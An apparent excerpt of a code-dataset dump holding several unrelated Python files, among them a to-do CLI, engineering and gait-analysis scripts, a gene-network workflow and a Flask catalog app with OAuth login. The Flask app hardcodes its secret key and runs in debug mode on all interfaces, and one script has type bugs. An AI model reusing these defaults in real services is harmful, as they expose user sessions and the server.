wave.open(WAVE_OUTPUT_FILENAME, 'wb')\n wf.setnchannels(CHANNELS)\n wf.setsampwidth(p.get_sample_size(FORMAT))\n wf.setframerate(RATE)\n wf.writeframes(b''.join(frames))\n wf.close()\n return WAVE_OUTPUT_FILENAME\n","sub_path":"recorder/the_recorder/recorder_sound.py","file_name":"recorder_sound.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"390376920","text":"import calendar\nfrom time import strptime\n\nfrom sqlalchemy import create_engine, func\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String, Date\nfrom datetime import datetime, timedelta, date\nfrom sqlalchemy.orm import sessionmaker\n\nengine = create_engine('sqlite:///todo.db?check_same_thread=False')\n\nBase = declarative_base()\n\n\nclass Table(Base):\n __tablename__ = 'task'\n id = Column(Integer, primary_key=True)\n task = Column(String)\n deadline = Column(Date, default=datetime.today())\n\n def __repr__(self):\n return self.task\n\n\nBase.metadata.create_all(engine)\n\nSession = sessionmaker(bind=engine)\nsession = Session()\n\nmenu = \"\"\"1) Today's tasks\n2) Week's tasks\n3) All tasks\n4) Missed tasks\n5) Add task\n6) Delete task\n0) Exit\"\"\"\n\nprint(menu)\nchoice = int(input())\n\n\ndef day_task(day):\n rows = session.query(Table).filter(func.DATE(Table.deadline == day))\n print(day.strftime(\"%A\"), day.day, day.strftime(\"%B\") + \":\")\n if rows.count() >0:\n for i, row in zip(range(rows.count()), rows):\n print(f\"{i+1}.{row.task}\")\n else:\n print(\"Nothing to do!\")\n\n\ndef daterange(start_date, end_date):\n for n in range(int((end_date - start_date).days)):\n yield start_date + timedelta(n)\n\n\nwhile choice != 0:\n print(\"\")\n #today's tasks\n if choice == 1:\n day_task(datetime.today().date())\n\n #week's tasks\n elif choice == 2:\n for day in daterange(datetime.today(), datetime.today() + timedelta(days=7)):\n day_task(day)\n print(\"\")\n\n #all tasks\n elif choice == 3:\n rows = session.query(Table).order_by(Table.deadline)\n if rows.count() >0:\n for row in rows:\n print(f\"{row.task}. {str(row.deadline.day)} {calendar.month_abbr[row.deadline.month]}\")\n else:\n print(\"Nothing to do!\")\n\n #missed tasks\n elif choice == 4:\n rows = session.query(Table).filter(Table.deadline < datetime.today().date()).order_by(Table.deadline)\n if rows.count() > 0:\n print(\"Missed tasks:\")\n for row in rows:\n print(f\"{row.task}. {str(row.deadline.day)} {calendar.month_abbr[row.deadline.month]}\")\n else:\n print(\"Nothing is missed!\")\n\n #add task\n elif choice == 5:\n task = input(\"Enter task\\n\")\n deadline = input(\"Enter deadline\\n\")\n new_row = Table(task=task)\n y, m, d = deadline.split('-')\n deadline = datetime(int(y), int(m), int(d))\n new_row.deadline = deadline\n session.add(new_row)\n session.commit()\n print(\"The task has been added!\")\n\n #delete task\n elif choice == 6:\n print(\"Choose the number of the task you want to delete\")\n rows = session.query(Table).order_by(Table.deadline)\n if rows.count() > 0:\n for i, row in zip(range(rows.count()),rows):\n print(f\"{i+1}. {row.task}. {str(row.deadline.day)} {calendar.month_abbr[row.deadline.month]}\")\n task_number = int(input())\n session.delete(rows[task_number-1])\n session.commit()\n print(\"The task has been deleted!\")\n print(\"\")\n print(menu)\n choice = int(input())\n\nif choice == 0:\n print(\"Bye!\")\n","sub_path":"To-Do List/task/todolist/todolist.py","file_name":"todolist.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"437411281","text":"import math\nimport matplotlib.pyplot as plt\nimport numpy as np\nprint(\"este es un programa de un sistema de un grado de libertad de dos columnas y una viga\")\ncarg=input(\"agrega la carga que estara sobre la estructura(Toneladas sobre metro) \")\nx0=input(\"agrega el dezplazamiento que tomara el cuerpo (en cm) \")\nv0=input(\"agrega la velocidad inicial que tomara el cuerpo (en cm/s) \")\nh=input(\"agrega la altura del cuerpo (en m) \")\nl=input(\"agrega lo largo que tendra el cuerpo (en m) \")\namort=input(\"agrega el porcentaje de amoriguamiento del material en decimales \")\nx1=input(\"agrega el largo de la viga (en cm) \")\ny1=input(\"agrega el ancho de la viga (en cm) \")\nfc=input(\"agrega la resistencia al concreto del cuerpo(kg/cm2) \")\nx=np.linspace(0,6,100)\ne=2.718281828\nm=carg*l/9.81 #masa\ni=((l*h)**3)/.5 #inercia\nec=10000*((fc)**.5) #modulo de elasticidad\nk=24*ec*i/((h*100)**3) #rigidez de la columna\nw=(k/m)**.5\nb=amort*w\nwd=w*((1-amort**2)**(.5))\nep=e**(-b*x)\nsig11=x0\nsig121=[wd*xx for xx in x]\nsig12=[math.cos((s121*3.1416)/180) for s121 in sig121]\nsig1=[sig11*s for s in sig12]\nsig2=[((v0+(b*x0))/(wd*xx))*math.sin((wd*xx*3.1416)/180) for xx in x]\nsig=[sig1[i]+sig2[i] for i in range(len(sig1))]\ny=ep*sig\nplt.plot(x,y,linewidth=3,color='blue')\nplt.legend()\nplt.title('$grafica del movimiento del cuerpo conforme al tiempo$')\nplt.xlabel('tiempo')\nplt.ylabel('velocidad')\nplt.grid(True)\nplt.savefig('graficaproyc.png')\nplt.show()\n","sub_path":"proyectofinal.py","file_name":"proyectofinal.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"256142944","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom sklearn import datasets\nfrom sklearn.cluster import KMeans\nfrom scipy import optimize\nfrom numpy import*\n\n\nR_N_CLUSTERS = 4\nL_N_CLUSTERS = 4\nproject_path = \"/home/yagi/CLionProjects/homographyStepEstimation/projects\"\nproject_name = \"optitrack\"\nvideo_name = \"021501\"\ntxt_path = project_path + \"/\" + project_name + \"/results/\" + video_name + \"/\"\n\nr_result_path = txt_path + 'Rresult.txt'\nl_result_path = txt_path + 'Lresult.txt'\n\ndef loadData(path):\n ptList = []\n frameList = []\n with open(path) as f:\n for s_line in f:\n words = s_line.split(\" \")\n point = []\n point.append(int(words[0]))\n point.append(int(words[1]))\n point.append(int(words[2]))\n ptList.append(point)\n frameList.append(int(words[2]))\n return np.array(ptList)\n\ndef kmeans(features, N_CLUSTERS):\n # クラスタリングする\n cls = KMeans(n_clusters=N_CLUSTERS)\n pred = cls.fit_predict(features)\n\n # 各要素をラベルごとに色付けして表示する\n for i in range(N_CLUSTERS):\n labels = features[pred == i]\n plt.scatter(labels[:, 0], labels[:, 1])\n\n # クラスタのセントロイド (重心) を描く\n centers = cls.cluster_centers_\n\n # 重心をソート\n centers.sort(axis=0)\n plt.scatter(centers[:, 0], centers[:, 1], s=100,\n facecolors='none', edgecolors='black')\n plt.show()\n\n return centers\n\n#Least squares method with scipy.optimize\ndef fit_func(parameter,x,y):\n a = parameter[0]\n b = parameter[1]\n residual = y-(a*x+b)\n return residual\n\ndef linearApproximation(data):\n xdata = data[:, 0]\n ydata = data[:, 1]\n print(xdata)\n print(ydata)\n parameter0 = [0., 0.]\n result = optimize.leastsq(fit_func, parameter0, args=(xdata, ydata))\n a_fit = result[0][0]\n b_fit = result[0][1]\n\n print(a_fit, b_fit)\n return a_fit, b_fit\n\ndef getStrideLength(data):\n steps = data[:,:2]\n slList = []\n for i in range(steps.shape[0] - 1):\n a = np.array([steps[i,0],steps[i,1]])\n b = np.array([steps[i+1,0],steps[i+1,1]])\n u = b - a\n sl = np.linalg.norm(u)\n slList.append(sl)\n return slList\n\ndef getStrideWidth(steps, a, b):\n pt1 = (0, b)\n pt2 = (500, 500*a+b)\n swList = []\n for i in range(steps.shape[0]):\n sw = distance_l(pt1, pt2, (steps[i,0],steps[i,1]))\n swList.append(sw)\n return swList\n\ndef distance_l(a,b,c):\n u = np.array([b[0]-a[0],b[1]-a[1]])\n v = np.array([c[0]-a[0],c[1]-a[1]])\n L = abs(cross(u,v)/linalg.norm(u))\n return L\n\ndef output_result(steps, sl, sw, result_path):\n with open(result_path, mode='w') as f:\n\n f.write(\"step positions: \\n\")\n for i in range(steps.shape[0]):\n f.write(str(steps[i,0]) + \" \" + str((steps[i,1])))\n f.write(\"\\n\")\n\n f.write(\"step timing: \\n\")\n for i in range(steps.shape[0]):\n f.write(str(steps[i, 2]))\n f.write(\"\\n\")\n\n f.write(\"stride length: \\n\")\n for a in sl:\n f.write(str(a))\n f.write(\"\\n\")\n\n f.write(\"stride width: \\n\")\n for a in sw:\n f.write(str(a))\n f.write(\"\\n\")\n\ndef estimateParams(r, l):\n rsl = getStrideLength(r)\n lsl = getStrideLength(l)\n ra, rb = linearApproximation(r)\n la, lb = linearApproximation(l)\n rsw = getStrideWidth(r,la,lb)\n lsw = getStrideWidth(l,ra,rb)\n output_result(r, rsl, rsw, r_result_path)\n output_result(l, lsl, lsw, l_result_path)\n\n\nif __name__ == '__main__':\n Rsteps = loadData(txt_path + \"RstepPoints.csv\")\n Lsteps = loadData(txt_path + \"LstepPoints.csv\")\n Rcenters = kmeans(Rsteps, R_N_CLUSTERS)\n Lcenters = kmeans(Lsteps, L_N_CLUSTERS)\n estimateParams(Rcenters, Lcenters)\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"553112347","text":"from channels.auth import AuthMiddlewareStack\nfrom channels.routing import ProtocolTypeRouter, URLRouter\nimport chat.routing\n\n#'application' is very similar to 'urlpatterns'\napplication = ProtocolTypeRouter({\n #Now we wrap our routers inside the AuthMiddlewareStack so as to utilise the built-in authentication provided by django. \n 'websocket': AuthMiddlewareStack(\n URLRouter(\n chat.routing.websocket_urlpatterns\n )\n )\n\n})","sub_path":"core/routing.py","file_name":"routing.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"190930274","text":"\"\"\"\nRun Multitask Network Inference with TFA-AMuSR.\n\"\"\"\nimport os\n\n# Shadow built-in zip with itertools.izip if this is python2 (This puts out a memory dumpster fire)\ntry:\n from itertools import izip as zip\nexcept ImportError:\n pass\n\nimport pandas as pd\nimport numpy as np\nfrom inferelator_ng import utils\nfrom inferelator_ng import single_cell_puppeteer_workflow\nfrom inferelator_ng import single_cell_workflow\nfrom inferelator_ng import default\nfrom inferelator_ng import amusr_regression\nfrom inferelator_ng import results_processor\n\n\nclass ResultsProcessorMultiTask(results_processor.ResultsProcessor):\n \"\"\"\n This results processor should handle the results of the MultiTask inferelator\n\n It will output the results for each task, as well as rank-combining to construct a network from all tasks\n \"\"\"\n\n write_task_files = True\n tasks_names = []\n\n def __init__(self, betas, rescaled_betas, threshold=0.5, filter_method='overlap', tasks_names=None):\n \"\"\"\n :param betas: list(pd.DataFrame[G x K])\n :param rescaled_betas: list(pd.DataFrame[G x K])\n :param threshold: float\n :param filter_method: str\n How to handle gold standard filtering ('overlap' filters to beta, 'keep_all_gold_standard' doesn't filter)\n :param tasks_names: list(str)\n The names for each task\n \"\"\"\n self.betas = betas\n self.rescaled_betas = rescaled_betas\n self.filter_method = filter_method\n\n if 1 >= threshold >= 0:\n self.threshold = threshold\n else:\n raise ValueError(\"Threshold must be a float in the interval [0, 1]\")\n\n if tasks_names is not None:\n self.tasks_names = tasks_names\n\n def summarize_network(self, output_dir, gold_standard, priors, confidence_threshold=default.DEFAULT_CONF,\n precision_threshold=default.DEFAULT_PREC):\n \"\"\"\n Take the betas and rescaled beta_errors, construct a network, and test it against the gold standard\n :param output_dir: str\n Path to write files into. Don't write anything if this is None.\n :param gold_standard: pd.DataFrame [G x K]\n Gold standard to test the network against\n :param priors: pd.DataFrame [G x K]\n Prior data\n :param confidence_threshold: float\n :param precision_threshold: float\n :return aupr: float\n Returns the AUPR calculated from the network and gold standard\n :return stable_interactions: int\n Number of interactions with a combined confidence over confidence_threshold\n :return precision_interactions: int\n Number of interactions with a combined confidence over the precision from precision_threshold\n \"\"\"\n\n overall_confidences = []\n overall_resc_betas = []\n overall_sign = pd.DataFrame(np.zeros(self.betas[0][0].shape), index=self.betas[0][0].index,\n columns=self.betas[0][0].columns)\n overall_threshold = overall_sign.copy()\n\n for task_id, task_dir in enumerate(self.tasks_names):\n pr_calc = results_processor.RankSummaryPR(self.rescaled_betas[task_id], gold_standard,\n filter_method=self.filter_method)\n task_threshold, task_sign, task_nonzero = self.threshold_and_summarize(self.betas[task_id], self.threshold)\n task_resc_betas_mean, task_resc_betas_median = self.mean_and_median(self.rescaled_betas[task_id])\n network_data = {'beta.sign.sum': task_sign, 'var.exp.median': task_resc_betas_median}\n\n # Pile up data\n overall_confidences.append(pr_calc.combined_confidences())\n overall_resc_betas.append(task_resc_betas_median)\n overall_sign += np.sign(task_sign)\n overall_threshold += task_threshold\n\n utils.Debug.vprint(\"Model AUPR:\\t{aupr}\".format(aupr=pr_calc.aupr), level=0)\n\n if self.write_task_files is True and output_dir is not None:\n self.write_output_files(pr_calc, os.path.join(output_dir, task_dir), priors, task_threshold,\n network_data)\n\n overall_pr_calc = results_processor.RankSummaryPR(overall_confidences, gold_standard,\n filter_method=self.filter_method)\n\n overall_threshold = (overall_threshold / len(overall_confidences) > self.threshold).astype(int)\n overall_resc_betas_mean, overall_resc_betas_median = self.mean_and_median(overall_resc_betas)\n network_data = {'beta.sign.sum': overall_sign, 'var.exp.median': overall_resc_betas_median}\n\n utils.Debug.vprint(\"Model AUPR:\\t{aupr}\".format(aupr=overall_pr_calc.aupr), level=0)\n\n self.write_output_files(overall_pr_calc, output_dir, priors, overall_threshold, network_data,\n threshold_network=False)\n\n # Calculate how many interactions are stable (are above the combined confidence threshold)\n stable_interactions = overall_pr_calc.num_over_conf_threshold(confidence_threshold)\n # Calculate how many interactions we should keep for our model (are above the precision threshold)\n precision_interactions = overall_pr_calc.num_over_precision_threshold(precision_threshold)\n\n return overall_pr_calc.aupr, stable_interactions, precision_interactions\n\n\nclass SingleCellMultiTask(single_cell_workflow.SingleCellWorkflow, single_cell_puppeteer_workflow.PuppeteerWorkflow):\n \"\"\"\n Class that implements AMuSR multitask learning for single cell data\n\n Extends SingleCellWorkflow\n Inherits from PuppeteerWorkflow so that task preprocessing can be done more easily\n \"\"\"\n regression_type = amusr_regression\n prior_weight = 1.\n task_expression_filter = \"intersection\"\n\n # Task-specific data\n n_tasks = None\n task_design = []\n task_response = []\n task_meta_data = []\n task_bootstraps = []\n tasks_names = []\n\n # Axis labels to keep\n targets = None\n regulators = None\n\n def startup_finish(self):\n # If the expression matrix is [G x N], transpose it for preprocessing\n if not self.expression_matrix_columns_are_genes:\n self.expression_matrix = self.expression_matrix.transpose()\n\n # Filter expression and priors to align\n self.filter_expression_and_priors()\n self.separate_tasks_by_metadata()\n self.process_task_data()\n\n def align_priors_and_expression(self):\n pass\n\n def separate_tasks_by_metadata(self, meta_data_column=default.DEFAULT_METADATA_FOR_BATCH_CORRECTION):\n \"\"\"\n Take a single expression matrix and break it into multiple dataframes based on meta_data. Reset the\n self.expression_matrix and self.meta_data with a list of dataframes, self.n_tasks with the number of tasks,\n and self.tasks_names with the name from meta_data for each task.\n\n :param meta_data_column: str\n Meta_data column which corresponds to task ID\n\n \"\"\"\n\n task_name, task_data, task_metadata = [], [], []\n\n for task in self.meta_data[meta_data_column].unique():\n task_idx = self.meta_data[meta_data_column] == task\n task_data.append(self.expression_matrix.loc[:, task_idx])\n task_metadata.append(self.meta_data.loc[task_idx, :])\n task_name.append(task)\n\n self.n_tasks = len(task_data)\n self.expression_matrix = task_data\n self.meta_data = task_metadata\n self.tasks_names = task_name\n\n utils.Debug.vprint(\"Separated data into {ntask} tasks\".format(ntask=self.n_tasks), level=0)\n\n def process_task_data(self):\n \"\"\"\n Preprocess the individual task data using a child worker into task design and response data. Set\n self.task_design, self.task_response, self.task_meta_data, self.task_bootstraps with lists which contain\n DataFrames.\n\n Also set self.regulators and self.targets with pd.Indexes that correspond to the genes and tfs to model\n This is chosen based on the filtering strategy set in self.task_expression_filter\n \"\"\"\n\n self.task_design, self.task_response, self.task_meta_data, self.task_bootstraps = [], [], [], []\n targets, regulators = [], []\n\n for expr_data, meta_data in zip(self.expression_matrix, self.meta_data):\n task = self.new_puppet(expr_data, meta_data, seed=self.random_seed)\n task.startup_finish()\n self.task_design.append(task.design)\n self.task_response.append(task.response)\n self.task_meta_data.append(task.meta_data)\n self.task_bootstraps.append(task.get_bootstraps())\n\n regulators.append(task.design.index)\n targets.append(task.response.index)\n\n self.targets = amusr_regression.filter_genes_on_tasks(targets, self.task_expression_filter)\n self.regulators = amusr_regression.filter_genes_on_tasks(regulators, self.task_expression_filter)\n self.expression_matrix = None\n\n utils.Debug.vprint(\"Processed data into design/response [{g} x {k}]\".format(g=len(self.targets),\n k=len(self.regulators)), level=0)\n\n def emit_results(self, betas, rescaled_betas, gold_standard, priors_data):\n \"\"\"\n Output result report(s) for workflow run.\n \"\"\"\n if self.is_master():\n self.create_output_dir()\n rp = ResultsProcessorMultiTask(betas, rescaled_betas, filter_method=self.gold_standard_filter_method,\n tasks_names=self.tasks_names)\n results = rp.summarize_network(self.output_dir, gold_standard, priors_data)\n self.aupr, self.n_interact, self.precision_interact = results\n else:\n self.aupr, self.n_interact, self.precision_interact = None, None, None\n","sub_path":"inferelator_ng/amusr_workflow.py","file_name":"amusr_workflow.py","file_ext":"py","file_size_in_byte":10013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"185720709","text":"#!/usr/bin/env python3\nfrom flask import Flask, render_template, request, redirect, jsonify, url_for,\\\n flash\n\nfrom sqlalchemy import create_engine, asc, desc\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, Category, Item, User\n\nfrom flask import session as login_session\nimport random\nimport string\n\nfrom oauth2client.client import flow_from_clientsecrets\nfrom oauth2client.client import FlowExchangeError\nimport httplib2\nimport json\nfrom flask import make_response\nimport requests\n\napp = Flask(__name__)\nCLIENT_ID = json.loads(\n open('client_secrets.json', 'r').read())['web']['client_id']\n\n# Connect database and create database session\nengine = create_engine('sqlite:///project.db')\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n\n# Login page (login with FB or Google)\n@app.route('/login')\ndef showLogin():\n # create a session state\n state = ''.join(random.choice(string.ascii_uppercase + string.digits) for\n x in range(32))\n login_session['state'] = state\n return render_template('login.html', STATE=state)\n\n\n# Login for google\n@app.route('/gconnect', methods=['POST'])\ndef gconnect():\n # Check the login state matches the state sent through request\n if request.args.get('state') != login_session['state']:\n response = make_response(json.dumps('Invalid state'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n code = request.data\n try:\n # Upgrade the authorization code into a credentials object.\n oauth_flow = flow_from_clientsecrets('client_secrets.json', scope='')\n oauth_flow.redirect_uri = 'postmessage'\n credentials = oauth_flow.step2_exchange(code)\n except FlowExchangeError:\n response = make_response(json.dumps\n ('Failed to upgrade the authorization code.'))\n response.headers['Content-Type'] = 'application/json'\n return response\n\n access_token = credentials.access_token\n url = 'https://www.googleapis.com/oauth2/v1/'\n url += 'tokeninfo?access_token=%s' % access_token\n h = httplib2.Http()\n result = json.loads(h.request(url, 'GET')[1].decode('utf-8'))\n\n # Check for error in access_token\n if result.get('error') is not None:\n response = make_response(json.dumps(result.get('error')), 500)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is used for the intended user.\n gplus_id = credentials.id_token['sub']\n if result['user_id'] != gplus_id:\n response = make_response(\n json.dumps(\"Token's user ID doesn't match given user ID.\"), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is valid for this app.\n if result['issued_to'] != CLIENT_ID:\n response = make_response(\n json.dumps(\"Token's client ID does not match app's.\"), 401)\n print (\"Token's client ID does not match app's.\")\n response.headers['Content-Type'] = 'application/json'\n return response\n\n stored_credentials = login_session.get('credentials')\n stored_gplus_id = login_session.get('gplus_id')\n # Check to see if user is already connected.\n if stored_credentials is not None and gplus_id == stored_gplus_id:\n response = make_response(\n json.dumps('Current user is already connected.'), 200)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n login_session['provider'] = \"google\"\n login_session['credentials'] = credentials.access_token\n login_session['gplus_id'] = gplus_id\n\n # Get user info\n userinfo_url = \"https://www.googleapis.com/oauth2/v1/userinfo\"\n params = {'access_token': credentials.access_token, 'alt': 'json'}\n answer = requests.get(userinfo_url, params=params)\n data = answer.json()\n\n login_session['username'] = data['name']\n login_session['picture'] = data['picture']\n login_session['email'] = data['email']\n\n user_id = getUserID(login_session['email'])\n if user_id is None:\n user_id = createUser(login_session)\n login_session['user_id'] = user_id\n print(user_id)\n\n output = ''\n output += '

Welcome, '\n output += login_session['username']\n output += '!

'\n output += ' '''\n\n flash(\"You are now logged in as %s\" % login_session['username'])\n print (\"done!\")\n return output\n\n\n# Disconnect from google\n@app.route(\"/gdisconnect\")\ndef gdisconnect():\n access_token = \"\"\n access_token = login_session['credentials']\n # Check to see if user is connected.\n if access_token is None:\n response = make_response(\n json.dumps('Current user not connected.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Revoke access token\n url = 'https://accounts.google.com/o/oauth2/revoke?token=%s' % access_token\n h = httplib2.Http()\n result = h.request(url, 'GET')[0]\n\n if result['status'] == '200':\n del login_session['credentials']\n del login_session['gplus_id']\n del login_session['username']\n del login_session['email']\n del login_session['picture']\n\n response = make_response(\n json.dumps('Successfully disconnected.'), 200)\n response.headers['Content-Type'] = 'application/json'\n return response\n else:\n response = make_response(\n json.dumps('Failed to revoke token for given user.'), 400)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n\n# Connect to Facebook\n@app.route('/fbconnect', methods=['POST'])\ndef fbconnect():\n # Validate state token\n if request.args.get('state') != login_session['state']:\n response = make_response(json.dumps('Invalid state parameter.'), 401)\n response.headers['Content-Type'] = 'application.json'\n return response\n\n # Obtain short term token\n access_token = request.data.decode(\"utf-8\")\n\n app_id = json.loads(\n open('fb_client_secrets.json', 'r').read())['web']['app_id']\n app_secret = json.loads(\n open('fb_client_secrets.json', 'r').read())['web']['app_secret']\n url = 'https://graph.facebook.com/oauth/access_token?grant_type=fb_'\n url += 'exchange_token&client_id={}&client_secret={}&fb_exchange_token={}'\\\n .format(app_id, app_secret, access_token)\n\n # Obtain long term token\n h = httplib2.Http()\n result = h.request(url, 'GET')[1]\n data = json.loads(result.decode('utf-8'))\n userinfo_url = \"https://graph.facebook.com/v2.10/me\"\n token = 'access_token=' + data['access_token']\n\n # Obtain user info\n url = 'https://graph.facebook.com/v2.10/me?%s&fields=name,id,email' % token\n h = httplib2.Http()\n result = json.loads(h.request(url, 'GET')[1].decode('utf-8'))\n\n login_session['provider'] = \"facebook\"\n login_session['username'] = result['name']\n login_session['facebook_id'] = result['id']\n login_session['email'] = result['email']\n login_session['credentials'] = access_token\n\n # Obtain profile picture\n url = 'https://graph.facebook.com/v2.10/me/picture?%s&' % token\n url += 'redirect=0&height=200&width=200'\n print(url)\n h = httplib2.Http()\n result = json.loads(h.request(url, 'GET')[1].decode('utf-8'))\n\n login_session['picture'] = result['data']['url']\n\n user_id = getUserID(login_session['email'])\n if user_id is None:\n user_id = createUser(login_session)\n login_session['user_id'] = user_id\n print(login_session['user_id'])\n\n output = ''\n output += '

Welcome, '\n output += login_session['username']\n output += '!

'\n output += ' '''\n\n flash(\"You are now logged in as %s\" % login_session['username'])\n print (\"done!\")\n return output\n\n\n# Disconnect from Facebook\n@app.route('/fbdisconnect')\ndef fbdisconnect():\n facebook_id = login_session['facebook_id']\n url = 'https://graph.facebook.com/%s/permissions' % facebook_id\n h = httplib2.Http()\n result = h.request(url, 'DELETE')[1]\n del login_session['username']\n del login_session['email']\n del login_session['picture']\n del login_session['user_id']\n del login_session['facebook_id']\n return \"you have been logged out\"\n\n\n# Handle disconnect for both FB and google.\n@app.route('/disconnect')\ndef disconnect():\n if 'provider' in login_session:\n if login_session['provider'] == \"google\":\n gdisconnect()\n\n elif login_session['provider'] == \"facebook\":\n fbdisconnect()\n\n del login_session['provider']\n flash(\"Successfully Disconnected\")\n return redirect('/')\n else:\n return redirect('/')\n\n\n# Return catalog info in JSON\n@app.route('/catalog/JSON')\ndef catalogJSON():\n categories = session.query(Category).all()\n return jsonify(categories=[i.serialize for i in categories])\n\n\n# Return Item information in JSON\n@app.route('/catalog//items/JSON')\ndef categoryItemsJSON(category_id):\n items = session.query(Item).filter_by(category_id=category_id).all()\n return jsonify(Items=[i.serialize for i in items])\n\n\n# Show home catalog home page and latest items.\n@app.route('/')\n@app.route('/catalog/')\ndef showCatalog():\n categories = session.query(Category).order_by(asc(Category.id))\n items = session.query(Item).order_by(desc(Item.id))\n if 'username' not in login_session:\n return render_template(\n 'public_catalog.html', categories=categories, items=items)\n else:\n return render_template(\n 'catalog.html', categories=categories, items=items)\n\n\n# Show specific category with items.\n@app.route('/catalog//')\n@app.route('/catalog//items/')\ndef showItems(category_id):\n categories = session.query(Category).order_by(asc(Category.id))\n category = session.query(Category).filter_by(id=category_id).one()\n items = session.query(Item).filter_by(category_id=category_id).all()\n if 'username' not in login_session:\n return render_template(\n 'public_items.html', category=category,\n categories=categories, items=items)\n else:\n current = getUserInfo(login_session['user_id'])\n creator = getUserInfo(category.user_id)\n return render_template(\n 'items.html', category=category, categories=categories,\n items=items, current=current, creator=creator)\n\n\n# Show specific item and description\n@app.route('/catalog///')\ndef showItem(category_id, item_id):\n item = session.query(Item).filter_by(id=item_id).one()\n if 'username' not in login_session:\n return render_template('public_showItem.html', item=item)\n else:\n current = getUserInfo(login_session['user_id'])\n creator = getUserInfo(item.user_id)\n return render_template(\n 'showItem.html', item=item, current=current, creator=creator)\n\n\n# Create a new category\n@app.route('/catalog/new/', methods=['GET', 'POST'])\ndef newCategory():\n if 'username' not in login_session:\n return redirect('/login')\n else:\n if request.method == 'POST':\n newCategory = Category(name=request.form['name'],\n user_id=login_session['user_id'])\n session.add(newCategory)\n session.commit()\n flash('New Category Successfully Created')\n return redirect(url_for('showCatalog'))\n else:\n return render_template('addCategory.html')\n\n\n# Edit category details\n@app.route('/catalog//edit/', methods=['GET', 'POST'])\ndef editCategory(category_id):\n category = session.query(Category).filter_by(id=category_id).one()\n if 'username' not in login_session:\n return redirect('/login')\n elif category.user_id != login_session['user_id']:\n return \"\"\"\"\"\"\n else:\n if request.method == 'POST':\n if request.form['name']:\n category.name = request.form['name']\n session.add(category)\n session.commit()\n flash('%s Successfully Updated' % category.name)\n return redirect(url_for('showItems', category_id=category_id))\n else:\n return render_template('editCatalog.html', category=category)\n\n\n# Delete category\n@app.route('/catalog//delete/', methods=['GET', 'POST'])\ndef deleteCategory(category_id):\n category = session.query(Category).filter_by(id=category_id).one()\n if 'username' not in login_session:\n return redirect('/login')\n elif category.user_id != login_session['user_id']:\n return \"\"\"\"\"\"\n else:\n if request.method == 'POST':\n session.delete(category)\n flash('%s Successfully Deleted' % category.name)\n session.commit()\n return redirect(url_for('showCatalog'))\n else:\n return render_template('deleteCatalog.html', category=category)\n\n\n# Add a new item\n@app.route('/catalog//items/new/', methods=['GET', 'POST'])\ndef newItem(category_id):\n if 'username' not in login_session:\n return redirect('/login')\n else:\n if request.method == 'POST':\n newItem = Item(name=request.form['name'],\n description=request.form['description'],\n category_id=category_id,\n user_id=login_session['user_id'])\n session.add(newItem)\n session.commit()\n flash('New Item Successfully Created')\n return redirect(url_for('showItems', category_id=category_id))\n else:\n return render_template('addItem.html', category_id=category_id)\n\n\n# Edit item details\n@app.route('/catalog///edit/',\n methods=['GET', 'POST'])\ndef editItem(category_id, item_id):\n item = session.query(Item).filter_by(id=item_id).one()\n if 'username' not in login_session:\n return redirect('/login')\n elif item.user_id != login_session['user_id']:\n return \"\"\"\"\"\"\n else:\n if request.method == 'POST':\n if request.form['name']:\n item.name = request.form['name']\n if request.form['description']:\n item.description = request.form['description']\n session.add(item)\n session.commit()\n flash('%s Successfully Updated' % item.name)\n return redirect(\n url_for('showItem', category_id=category_id, item_id=item_id))\n else:\n return render_template('editItem.html', item=item)\n\n\n# Delete an item\n@app.route('/catalog///delete/',\n methods=['GET', 'POST'])\ndef deleteItem(category_id, item_id):\n item = session.query(Item).filter_by(id=item_id).one()\n category = session.query(Category).filter_by(id=category_id).one()\n if 'username' not in login_session:\n return redirect('/login')\n elif item.user_id != login_session['user_id']:\n return \"\"\"\"\"\"\n else:\n if request.method == 'POST':\n session.delete(item)\n flash('%s Succesfully Deleted' % item.name)\n session.commit()\n return redirect(url_for('showItems', category_id=category_id))\n else:\n return render_template(\n 'deleteItem.html', item=item, category=category)\n\n\n# Adding new user to the database.\ndef createUser(login_session):\n newUser = User(name=login_session['username'],\n email=login_session['email'],\n picture=login_session['picture'])\n session.add(newUser)\n session.commit()\n user = session.query(User).filter_by(email=login_session['email']).one()\n return user.id\n\n\n# Obtaining user info\ndef getUserInfo(user_id):\n user = session.query(User).filter_by(id=user_id).one()\n return user\n\n\n# Obtaining user ID\ndef getUserID(email):\n try:\n user = session.query(User).filter_by(email=email).one()\n return user.id\n except:\n return None\n\n\nif __name__ == '__main__':\n app.secret_key = 'super_secret_key'\n app.debug = True\n app.run(host='0.0.0.0', port=5000)\n","sub_path":"Backend/Item Catalog/vagrant/catalog/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":17421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"75328780","text":"from keras.models import model_from_json\nfrom pandas import read_csv\nfrom sklearn.preprocessing import Normalizer\nfrom numpy import expand_dims,zeros\nfrom 